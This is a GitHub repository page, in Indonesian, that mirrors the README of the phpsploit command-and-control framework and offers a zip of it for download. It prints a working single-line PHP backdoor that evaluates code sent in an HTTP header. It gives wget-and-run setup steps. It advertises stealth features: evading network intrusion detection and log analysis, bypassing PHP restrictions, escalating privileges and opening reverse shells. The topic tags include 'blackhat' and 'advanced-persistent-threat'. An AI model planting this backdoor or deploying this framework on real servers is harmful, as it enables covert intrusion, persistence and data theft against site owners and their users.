Skip to content
/ phpsploit-backup Public

Backup $ Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor

www.exploits7.my.id/2024/09/cara-backconnect-atau-reverse-shell.html
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

JawaTengahXploit1337/phpsploit-backup

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
php.zip
php.zip
 
 

Repository files navigation

Master

Framework C2 yang lengkap dengan fitur yang diam-diam tetap bertahan
di server web melalui PHP oneliner polimorfik tweet


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Dibuat oleh nil0x42 dan kontributor

Info

Perlu di ketahui, bahwa repository di buat untuk bertujuan back up script asli dari nil0x42 agar suatau saat kalau tools asli hilang atau terblokir masih ada backup file tools di sini, tanpa saya mengubah isinya sedikitpun _<

Ikhtisar

Komunikasi tersamarkan dicapai dengan menggunakan header HTTP di bawah permintaan klien standar dan respons relatif server web, ditunnel melalui backdoor polimorfik kecil:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Panduan Cepat

wget https://github.com/JawaTengahXploit1337/phpsploit-backup/raw/refs/heads/main/php.zip
unzip php.zip
cd phpsploit
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Fitur

  • Efisien: Lebih dari 20 plugin untuk mengotomatiskan tugas eskalasi privilese

    • Menjalankan perintah dan menjelajahi sistem file, melewati pembatasan keamanan PHP
    • Mengunggah/Mengunduh file antara klien dan target
    • Mengedit file jarak jauh melalui editor teks lokal
    • Menjalankan konsol SQL di sistem target
    • Membuka reverse TCP shell

  • Tersembunyi: Dibuat untuk paranoia tingkat tinggi

    • Hampir tidak terlihat oleh analisis log dan deteksi tanda tangan NIDS
    • Bypass pembatasan keamanan PHP umum
    • Komunikasi tersembunyi di header HTTP
    • Payload yang dimuat tersamarkan untuk melewati NIDS
    • Dukungan proxy: http/https/socks4/socks5

  • Nyaman: Antarmuka yang kokoh dengan banyak fitur penting

    • Bantuan rinci untuk setiap opsi (perintah help)
    • Lintas platform di klien dan server
    • CLI mendukung auto-completion & multi-command
    • Fitur penyimpanan/pemuatan sesi & riwayat yang persisten
    • Mendukung permintaan besar untuk payload besar (misalnya unggahan)
    • Mesin pengaturan yang sangat dapat dikonfigurasi
    • Setiap pengaturan, seperti user-agent, memiliki mode polimorfik
    • Variabel lingkungan kustom untuk interaksi plugin
    • API pengembangan plugin yang lengkap

Platform yang Didukung (sebagai penyerang):

  • GNU/Linux
  • Mac OS X

Platform yang Didukung (sebagai target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Kontributor

Terima kasih kepada orang-orang hebat ini:


nil0x42
💻 🚇 🔌 ⚠️
shiney-wh
💻 🔌
Wannes Rombouts
💻 🚧
Amine Ben Asker
💻 🚧
jose nazario
📖 🐛
Sujit Ghosal
📝
Zerdoumi
🐛

tristandostaler
🐛
Rohan Tarai
🐛
Jonas Lejon
📝

This project follows the all-contributors specification. Contributions of any kind welcome

About

Backup $ Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor

www.exploits7.my.id/2024/09/cara-backconnect-atau-reverse-shell.html

Topics

backdoor persistence hacking blackhat post-exploitation stealth privilege-escalation webshell php-backdoor web-hacking c2 hacktool command-and-control hacking-framework redteam php-webshell php-webshell-backdoor advanced-persistent-threat

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published